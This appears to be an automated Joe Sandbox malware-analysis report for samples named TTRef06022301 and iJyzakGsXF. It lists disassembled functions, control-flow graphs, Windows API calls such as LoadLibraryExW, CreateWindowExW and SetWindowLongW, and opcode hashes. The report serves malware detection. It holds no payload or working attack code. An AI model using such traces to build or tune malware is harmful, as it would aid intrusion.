                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 841 27c0a40-27c0aaa SetWindowLongW 842 27c0aac-27c0ab2 841->842 843 27c0ab3-27c0ac7 841->843 842->843
                                                                                                                                      APIs
                                                                                                                                      • SetWindowLongW.USER32(?,?,?), ref: 027C0A9D
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.273637048.00000000027C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_27c0000_TTRef06022301.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: LongWindow
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1378638983-0
                                                                                                                                      • Opcode ID: a074d9028d85974e25a33cba6cab0e383ff2279223deef3f92c2c7c58a1b7662
                                                                                                                                      • Instruction ID: 939d3f32681ed530724d2959cfcfec30f0b8e1d41202236c1918049e535edd4d
                                                                                                                                      • Opcode Fuzzy Hash: a074d9028d85974e25a33cba6cab0e383ff2279223deef3f92c2c7c58a1b7662
                                                                                                                                      • Instruction Fuzzy Hash: 5F11D3B59002099FDB10DF9AD584BDEBBF8EB48324F20855AD915A7240C375A944CFA5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Non-executed Functions

                                                                                                                                      Function 00ABEBA0 Relevance: .3, Instructions: 315COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.263371665.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_TTRef06022301.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 29c559f987745ec07536afa0a9ddd38c3d5b30db04d5bb84138677b2cce03367
                                                                                                                                      • Instruction ID: 6d56cebf5a5ad7a3e2b5ca272244e5b818d8975d9d910718e29d2c8dc07b0818
                                                                                                                                      • Opcode Fuzzy Hash: 29c559f987745ec07536afa0a9ddd38c3d5b30db04d5bb84138677b2cce03367
                                                                                                                                      • Instruction Fuzzy Hash: 9C12B6F1C91746CAE710CF66E8D81893F61B744328BD0CB08D2616BAD9DBB8156ECF48
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00ABD16C Relevance: .3, Instructions: 265COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.263371665.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_TTRef06022301.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f60bcced4f0c9eff3f91ccb7de02b8027b295e2995003896124fc402554e5890
                                                                                                                                      • Instruction ID: b42752fbb568ea91e4e93f48f6ac4df5e75b5fbb0ca7e76bd0f1748e55998aaa
                                                                                                                                      • Opcode Fuzzy Hash: f60bcced4f0c9eff3f91ccb7de02b8027b295e2995003896124fc402554e5890
                                                                                                                                      • Instruction Fuzzy Hash: B8A16032E002198FCF15DFA5C9445DEBBF6FF85300B1585AAE805AB262EB71E955CB40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00ABEB90 Relevance: .2, Instructions: 224COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.263371665.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_TTRef06022301.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 3ecfca127a550ae44d6a3818f9730262b441071a34b1f05cd08d5a87c8a00939
                                                                                                                                      • Instruction ID: 8118b0d310b458c4a0430fec0226d91803e53616a84d5a8be26dcd8b8c245caa
                                                                                                                                      • Opcode Fuzzy Hash: 3ecfca127a550ae44d6a3818f9730262b441071a34b1f05cd08d5a87c8a00939
                                                                                                                                      • Instruction Fuzzy Hash: 1FC116F1C91746CAD710CF66E8D81893F71BB85328F90CA09D1616B6D8DBB8156ECF88
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:9.9%
                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                      Signature Coverage:0%
                                                                                                                                      Total number of Nodes:202
                                                                                                                                      Total number of Limit Nodes:7
                                                                                                                                      execution_graph 22963 8bc2d8 DuplicateHandle 22964 8bc36e 22963->22964 22965 23e6208 22966 23e6235 22965->22966 22989 23e5c20 22966->22989 22968 23e6263 22993 23e5c40 22968->22993 22970 23e62c7 22971 23e5c40 4 API calls 22970->22971 22972 23e632b 22971->22972 22973 23e5c40 4 API calls 22972->22973 22974 23e635d 22973->22974 22975 23e5c40 4 API calls 22974->22975 22976 23e638f 22975->22976 22977 23e5c40 4 API calls 22976->22977 22978 23e63f3 22977->22978 22979 23e5c20 4 API calls 22978->22979 22980 23e6425 22979->22980 22981 23e5c40 4 API calls 22980->22981 22982 23e6457 22981->22982 22983 23e5c20 4 API calls 22982->22983 22984 23e6489 22983->22984 22985 23e5c40 4 API calls 22984->22985 22986 23e6551 22985->22986 22987 23e5c40 4 API calls 22986->22987 22988 23e68a3 22987->22988 22990 23e5c2b 22989->22990 22992 23e8d47 22990->22992 22997 23e5f18 22990->22997 22992->22968 22994 23e5c4b 22993->22994 22996 8b6e34 4 API calls 22994->22996 22995 23efe23 22995->22970 22996->22995 22998 23e5f23 22997->22998 23000 8b6e34 4 API calls 22998->23000 22999 23e8dcc 22999->22992 23000->22999 23001 8bc0b0 GetCurrentProcess 23002 8bc12a GetCurrentThread 23001->23002 23003 8bc123 23001->23003 23004 8bc160 23002->23004 23005 8bc167 GetCurrentProcess 23002->23005 23003->23002 23004->23005 23006 8bc19d 23005->23006 23007 8bc1c5 GetCurrentThreadId 23006->23007 23008 8bc1f6 23007->23008 23009 8b40d0 23010 8b40e2 23009->23010 23011 8b40ee 23010->23011 23015 8b41e0 23010->23015 23020 8b3c64 23011->23020 23013 8b410d 23016 8b4205 23015->23016 23024 8b42d1 23016->23024 23028 8b42e0 23016->23028 23021 8b3c6f 23020->23021 23036 8b5b24 23021->23036 23023 8b704c 23023->23013 23026 8b4307 23024->23026 23025 8b43e4 23025->23025 23026->23025 23032 8b3de8 23026->23032 23030 8b4307 23028->23030 23029 8b43e4 23029->23029 23030->23029 23031 8b3de8 CreateActCtxA 23030->23031 23031->23029 23033 8b5370 CreateActCtxA 23032->23033 23035 8b5433 23033->23035 23037 8b5b2f 23036->23037 23040 8b5b54 23037->23040 23039 8b71c5 23039->23023 23041 8b5b5f 23040->23041 23044 8b6e04 23041->23044 23043 8b72a2 23043->23039 23045 8b6e0f 23044->23045 23046 8b6e34 4 API calls 23045->23046 23047 8b73a2 23046->23047 23047->23043 22803 71d01c 22804 71d034 22803->22804 22805 71d08e 22804->22805 22810 23e1698 22804->22810 22817 23e09a0 22804->22817 22823 23e09b0 22804->22823 22827 23e0134 22804->22827 22813 23e16d5 22810->22813 22811 23e1709 22838 23e025c 22811->22838 22813->22811 22814 23e16f9 22813->22814 22834 23e1830 22814->22834 22815 23e1707 22815->22815 22818 23e09df 22817->22818 22821 23e09ae 22817->22821 22819 23e09f7 22818->22819 22820 23e0134 CallWindowProcW 22818->22820 22819->22805 22820->22819 22822 23e0134 CallWindowProcW 22821->22822 22822->22819 22824 23e09d6 22823->22824 22825 23e0134 CallWindowProcW 22824->22825 22826 23e09f7 22825->22826 22826->22805 22828 23e013f 22827->22828 22829 23e1709 22828->22829 22831 23e16f9 22828->22831 22830 23e025c CallWindowProcW 22829->22830 22832 23e1707 22830->22832 22833 23e1830 CallWindowProcW 22831->22833 22832->22832 22833->22832 22836 23e1844 22834->22836 22835 23e18d0 22835->22815 22842 23e18e8 22836->22842 22839 23e0267 22838->22839 22840 23e2e4a CallWindowProcW 22839->22840 22841 23e2df9 22839->22841 22840->22841 22841->22815 22843 23e18f9 22842->22843 22845 23e2d80 22842->22845 22843->22835 22846 23e025c CallWindowProcW 22845->22846 22847 23e2d9a 22846->22847 22847->22843 23048 23e0a40 SetWindowLongW 23049 23e0aac 23048->23049 22848 23e9031 22851 23e60b8 22848->22851 22850 23e904f 22852 23e60c3 22851->22852 22853 23e9082 22852->22853 22855 8b6e34 22852->22855 22853->22850 22856 8b6e3f 22855->22856 22858 8b7abe 22856->22858 22864 8b9878 22856->22864 22868 23e8e60 22856->22868 22871 23ef950 22856->22871 22874 23e8e50 22856->22874 22857 8b7afc 22857->22853 22858->22857 22878 8bb9d0 22858->22878 22884 8b9cb8 22864->22884 22888 8b9cb6 22864->22888 22865 8b988e 22865->22858 22921 23e8eb7 22868->22921 22869 23e8e6e 22869->22858 22925 23efa48 22871->22925 22872 23ef95f 22872->22858 22875 23e8e5f 22874->22875 22876 23e8e6e 22874->22876 22875->22876 22877 23e8eb7 3 API calls 22875->22877 22876->22858 22877->22876 22879 8bba01 22878->22879 22880 8bba25 22879->22880 22929 8bbf89 22879->22929 22933 8bbf48 22879->22933 22937 8bbf98 22879->22937 22880->22857 22893 8b9da0 22884->22893 22901 8b9db0 22884->22901 22885 8b9cc7 22885->22865 22889 8b9cb8 22888->22889 22891 8b9da0 2 API calls 22889->22891 22892 8b9db0 2 API calls 22889->22892 22890 8b9cc7 22890->22865 22891->22890 22892->22890 22894 8b9dc3 22893->22894 22896 8b9ddb 22894->22896 22909 8ba028 22894->22909 22913 8ba038 22894->22913 22895 8b9dd3 22895->22896 22897 8b9fd8 GetModuleHandleW 22895->22897 22896->22885 22898 8ba005 22897->22898 22898->22885 22902 8b9dc3 22901->22902 22903 8b9ddb 22902->22903 22907 8ba028 LoadLibraryExW 22902->22907 22908 8ba038 LoadLibraryExW 22902->22908 22903->22885 22904 8b9dd3 22904->22903 22905 8b9fd8 GetModuleHandleW 22904->22905 22906 8ba005 22905->22906 22906->22885 22907->22904 22908->22904 22910 8ba038 22909->22910 22912 8ba071 22910->22912 22917 8b9a98 22910->22917 22912->22895 22914 8ba04c 22913->22914 22915 8b9a98 LoadLibraryExW 22914->22915 22916 8ba071 22914->22916 22915->22916 22916->22895 22918 8ba218 LoadLibraryExW 22917->22918 22920 8ba291 22918->22920 22920->22912 22923 8b9da0 2 API calls 22921->22923 22924 8b9db0 2 API calls 22921->22924 22922 23e8ed7 22922->22869 22923->22922 22924->22922 22927 8b9da0 2 API calls 22925->22927 22928 8b9db0 2 API calls 22925->22928 22926 23efa6a 22926->22872 22927->22926 22928->22926 22930 8bbf4b 22929->22930 22930->22929 22931 8bbfdf 22930->22931 22941 8bbd7c 22930->22941 22931->22880 22934 8bbf4b 22933->22934 22935 8bbfdf 22934->22935 22936 8bbd7c 4 API calls 22934->22936 22935->22880 22936->22935 22938 8bbfa5 22937->22938 22939 8bbfdf 22938->22939 22940 8bbd7c 4 API calls 22938->22940 22939->22880 22940->22939 22942 8bbd81 22941->22942 22943 8bc8d0 22942->22943 22945 8bbe64 22942->22945 22946 8bbe6f 22945->22946 22947 8b6e34 4 API calls 22946->22947 22948 8bc93f 22947->22948 22955 8bc9b3 22948->22955 22959 8bc9b8 22948->22959 22949 8bc94d 22951 8be6d8 LoadLibraryExW GetModuleHandleW CreateWindowExW 22949->22951 22952 8be6c0 LoadLibraryExW GetModuleHandleW CreateWindowExW 22949->22952 22950 8bc978 22950->22943 22951->22950 22952->22950 22956 8bc9b8 22955->22956 22957 8bcc99 22956->22957 22958 8bbf48 4 API calls 22956->22958 22958->22957 22960 8bc9e6 22959->22960 22961 8bcc99 22960->22961 22962 8bbf48 4 API calls 22960->22962 22962->22961

                                                                                                                                      Executed Functions

                                                                                                                                      Function 008BC0A1 Relevance: 6.1, APIs: 4, Instructions: 124threadCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 008BC110
                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 008BC14D
                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 008BC18A
                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 008BC1E3
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.317081706.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_8b0000_iJyzakGsXF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Current$ProcessThread
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2063062207-0
                                                                                                                                      • Opcode ID: 26d850c017c3eed984c35d65c12c6c9db8331e05cfc6f54c030d94a782adb8c4
                                                                                                                                      • Instruction ID: ea6dd547108546c731436a37f28626925dd7d6f3c7a11d24066ec8d069c87cf0
                                                                                                                                      • Opcode Fuzzy Hash: 26d850c017c3eed984c35d65c12c6c9db8331e05cfc6f54c030d94a782adb8c4
                                                                                                                                      • Instruction Fuzzy Hash: 155142B49003498FDB10CFAAD948BEEBBF5FB88314F248559E019B7361DB745884CB61
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 008BC0B0 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 008BC110
                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 008BC14D
                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 008BC18A
                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 008BC1E3
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.317081706.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_8b0000_iJyzakGsXF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Current$ProcessThread
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2063062207-0
                                                                                                                                      • Opcode ID: dfcd36068020745c1dfa990a7dd69c2d78b7ba187f88bfa8625e7f0e52b7e1bd
                                                                                                                                      • Instruction ID: 43405ebbf3469ec5a94c57a3d3adabab3f3140e787ec901c5be526cb757d91c1
                                                                                                                                      • Opcode Fuzzy Hash: dfcd36068020745c1dfa990a7dd69c2d78b7ba187f88bfa8625e7f0e52b7e1bd
                                                                                                                                      • Instruction Fuzzy Hash: B85140B49002498FDB10CFAAD948BEEBBF4FB88314F208559E019B3361DB746884CF65
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 008B9DB0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 39 8b9db0-8b9db8 40 8b9dc3-8b9dc5 39->40 41 8b9dbe call 8b882c 39->41 42 8b9ddb-8b9ddf 40->42 43 8b9dc7 40->43 41->40 44 8b9df3-8b9e34 42->44 45 8b9de1-8b9deb 42->45 95 8b9dcd call 8ba028 43->95 96 8b9dcd call 8ba038 43->96 50 8b9e41-8b9e4f 44->50 51 8b9e36-8b9e3e 44->51 45->44 46 8b9dd3-8b9dd5 46->42 47 8b9f10-8b9f8c 46->47 87 8b9f9a-8b9fd0 47->87 88 8b9f8e-8b9f99 47->88 52 8b9e73-8b9e75 50->52 53 8b9e51-8b9e56 50->53 51->50 55 8b9e78-8b9e7f 52->55 56 8b9e58-8b9e5f call 8b9a3c 53->56 57 8b9e61 53->57 60 8b9e8c-8b9e93 55->60 61 8b9e81-8b9e89 55->61 58 8b9e63-8b9e71 56->58 57->58 58->55 64 8b9ea0-8b9ea9 call 8b9a4c 60->64 65 8b9e95-8b9e9d 60->65 61->60 69 8b9eab-8b9eb3 64->69 70 8b9eb6-8b9ebb 64->70 65->64 69->70 72 8b9ed9-8b9edd 70->72 73 8b9ebd-8b9ec4 70->73 97 8b9ee0 call 8ba310 72->97 98 8b9ee0 call 8ba340 72->98 73->72 74 8b9ec6-8b9ed6 call 8b9a5c call 8b9a6c 73->74 74->72 77 8b9ee3-8b9ee6 80 8b9f09-8b9f0f 77->80 81 8b9ee8-8b9f06 77->81 81->80 90 8b9fd8-8ba003 GetModuleHandleW 87->90 91 8b9fd2-8b9fd5 87->91 88->87 92 8ba00c-8ba020 90->92 93 8ba005-8ba00b 90->93 91->90 93->92 95->46 96->46 97->77 98->77
                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 008B9FF6
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.317081706.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_8b0000_iJyzakGsXF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: HandleModule
                                                                                                                                      • String ID: $Oq$$Oq
                                                                                                                                      • API String ID: 4139908857-3704977154
                                                                                                                                      • Opcode ID: 33f3a8a7c12c66e9397a3d4ebe424b6855aab6b194aef9a14aaf3e511cbc5c61
                                                                                                                                      • Instruction ID: 590dfb80525bbdca9de14805312c58d51304f738a0a688259d815f715af5d948
                                                                                                                                      • Opcode Fuzzy Hash: 33f3a8a7c12c66e9397a3d4ebe424b6855aab6b194aef9a14aaf3e511cbc5c61
                                                                                                                                      • Instruction Fuzzy Hash: 15712470A00B058FDB24DF2AC4547AABBF5FF88310F108A29E58AD7B50DB74E945CB91
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 008B5364 Relevance: 1.6, APIs: 1, Instructions: 130COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1394 8b5364-8b536c 1395 8b52fe-8b5331 1394->1395 1396 8b536e 1394->1396 1399 8b533a-8b535b 1395->1399 1400 8b5333-8b5339 1395->1400 1398 8b5370-8b5431 CreateActCtxA 1396->1398 1403 8b543a-8b5494 1398->1403 1404 8b5433-8b5439 1398->1404 1400->1399 1411 8b54a3-8b54a7 1403->1411 1412 8b5496-8b5499 1403->1412 1404->1403 1413 8b54a9-8b54b5 1411->1413 1414 8b54b8 1411->1414 1412->1411 1413->1414 1416 8b54b9 1414->1416 1416->1416
                                                                                                                                      APIs
                                                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 008B5421
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.317081706.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_8b0000_iJyzakGsXF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Create
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                      • Opcode ID: b676f924ce8bdd1655de6f3bf861a9ea2feebe94b3bca2c112ef607ca6b3fc9a
                                                                                                                                      • Instruction ID: 015ef0e833cf13ce1d54ff70e38bcb59580007c37b4b6eb2dba616c10897db21
                                                                                                                                      • Opcode Fuzzy Hash: b676f924ce8bdd1655de6f3bf861a9ea2feebe94b3bca2c112ef607ca6b3fc9a
                                                                                                                                      • Instruction Fuzzy Hash: 5A5112B1C00659CFDB20CFAAC9447DEBBB5FF59304F24806AD409AB251D7759989CFA0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 023E00FC Relevance: 1.6, APIs: 1, Instructions: 123COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1417 23e00fc-23e085e 1420 23e0869-23e0870 1417->1420 1421 23e0860-23e0866 1417->1421 1422 23e087b-23e08b3 1420->1422 1423 23e0872-23e0878 1420->1423 1421->1420 1424 23e08bb-23e091a CreateWindowExW 1422->1424 1423->1422 1425 23e091c-23e0922 1424->1425 1426 23e0923-23e095b 1424->1426 1425->1426 1430 23e095d-23e0960 1426->1430 1431 23e0968 1426->1431 1430->1431 1432 23e0969 1431->1432 1432->1432
                                                                                                                                      APIs
                                                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 023E090A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.319789224.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_23e0000_iJyzakGsXF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateWindow
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 716092398-0
                                                                                                                                      • Opcode ID: ec717da7e354df5f0dbbff64a8b8b08b232d0daac975a7fd47ab795cc4d4f564
                                                                                                                                      • Instruction ID: fd96da44dd3a4e5d7dcd1c35504458d8d264ab4631c9e887584534d299d7fbc7
                                                                                                                                      • Opcode Fuzzy Hash: ec717da7e354df5f0dbbff64a8b8b08b232d0daac975a7fd47ab795cc4d4f564
                                                                                                                                      • Instruction Fuzzy Hash: 0A51F0B1D003199FDF14CFAAD894ADEBBB5FF58310F24822AE419AB250D7749845CF90
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 023E07EC Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1433 23e07ec-23e085e 1435 23e0869-23e0870 1433->1435 1436 23e0860-23e0866 1433->1436 1437 23e087b-23e08b3 1435->1437 1438 23e0872-23e0878 1435->1438 1436->1435 1439 23e08bb-23e091a CreateWindowExW 1437->1439 1438->1437 1440 23e091c-23e0922 1439->1440 1441 23e0923-23e095b 1439->1441 1440->1441 1445 23e095d-23e0960 1441->1445 1446 23e0968 1441->1446 1445->1446 1447 23e0969 1446->1447 1447->1447
                                                                                                                                      APIs
                                                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 023E090A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.319789224.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_23e0000_iJyzakGsXF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateWindow
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 716092398-0
                                                                                                                                      • Opcode ID: 8391587d82386089af30446db87c1a215e081db7aa6beae06d951b3d1aa86b87
                                                                                                                                      • Instruction ID: 7a0294c55e7c94258048d4765d5ac695fa95c8d3aac1b31272efdc5ea4c28844
                                                                                                                                      • Opcode Fuzzy Hash: 8391587d82386089af30446db87c1a215e081db7aa6beae06d951b3d1aa86b87
                                                                                                                                      • Instruction Fuzzy Hash: 9651BEB1D00219DFDF14CFAAD884ADEBBB5FF58314F24822AE819AB250D7749945CF90
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 023E010C Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1448 23e010c-23e085e 1450 23e0869-23e0870 1448->1450 1451 23e0860-23e0866 1448->1451 1452 23e087b-23e091a CreateWindowExW 1450->1452 1453 23e0872-23e0878 1450->1453 1451->1450 1455 23e091c-23e0922 1452->1455 1456 23e0923-23e095b 1452->1456 1453->1452 1455->1456 1460 23e095d-23e0960 1456->1460 1461 23e0968 1456->1461 1460->1461 1462 23e0969 1461->1462 1462->1462
                                                                                                                                      APIs
                                                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 023E090A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.319789224.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_23e0000_iJyzakGsXF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateWindow
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 716092398-0
                                                                                                                                      • Opcode ID: 34d1524e2be946ae1a3d9729740aaefc4a4c567d7f6a1d63a2b4054b4a101523
                                                                                                                                      • Instruction ID: aafd320132561f32d297f736603c21c2f76cd33b02da12fdb718c6b7b77df8c2
                                                                                                                                      • Opcode Fuzzy Hash: 34d1524e2be946ae1a3d9729740aaefc4a4c567d7f6a1d63a2b4054b4a101523
                                                                                                                                      • Instruction Fuzzy Hash: 0151BFB1D002199FDF14CF9AD884ADEBBB5BF58314F24822AE819BB250D7B49945CF90
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 023E025C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1463 23e025c-23e2dec 1466 23e2e9c-23e2ebc call 23e0134 1463->1466 1467 23e2df2-23e2df7 1463->1467 1474 23e2ebf-23e2ecc 1466->1474 1469 23e2e4a-23e2e82 CallWindowProcW 1467->1469 1470 23e2df9-23e2e30 1467->1470 1472 23e2e8b-23e2e9a 1469->1472 1473 23e2e84-23e2e8a 1469->1473 1476 23e2e39-23e2e48 1470->1476 1477 23e2e32-23e2e38 1470->1477 1472->1474 1473->1472 1476->1474 1477->1476
                                                                                                                                      APIs
                                                                                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 023E2E71
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.319789224.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_23e0000_iJyzakGsXF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CallProcWindow
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2714655100-0
                                                                                                                                      • Opcode ID: 9ce2840724179b56e963ff836fd1a20db2cf1d1b628fec4df1a464b8450e16be
                                                                                                                                      • Instruction ID: 919bbcdeaec7d924aa9fd0b5fd9b20bb1654efd903e85fa739a55b036bdb77d6
                                                                                                                                      • Opcode Fuzzy Hash: 9ce2840724179b56e963ff836fd1a20db2cf1d1b628fec4df1a464b8450e16be
                                                                                                                                      • Instruction Fuzzy Hash: 86411BB9A003258FCB14DF59C448BABBBF9FB88314F248559E519A7361D374A845CFA0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 008B3DE8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1480 8b3de8-8b5431 CreateActCtxA 1483 8b543a-8b5494 1480->1483 1484 8b5433-8b5439 1480->1484 1491 8b54a3-8b54a7 1483->1491 1492 8b5496-8b5499 1483->1492 1484->1483 1493 8b54a9-8b54b5 1491->1493 1494 8b54b8 1491->1494 1492->1491 1493->1494 1496 8b54b9 1494->1496 1496->1496
                                                                                                                                      APIs
                                                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 008B5421
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.317081706.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_8b0000_iJyzakGsXF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Create
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                      • Opcode ID: 5054ede1a2bf6436e56082cbecb2bf151e3e04c43aaa6dd5e55a4508c06a3daf
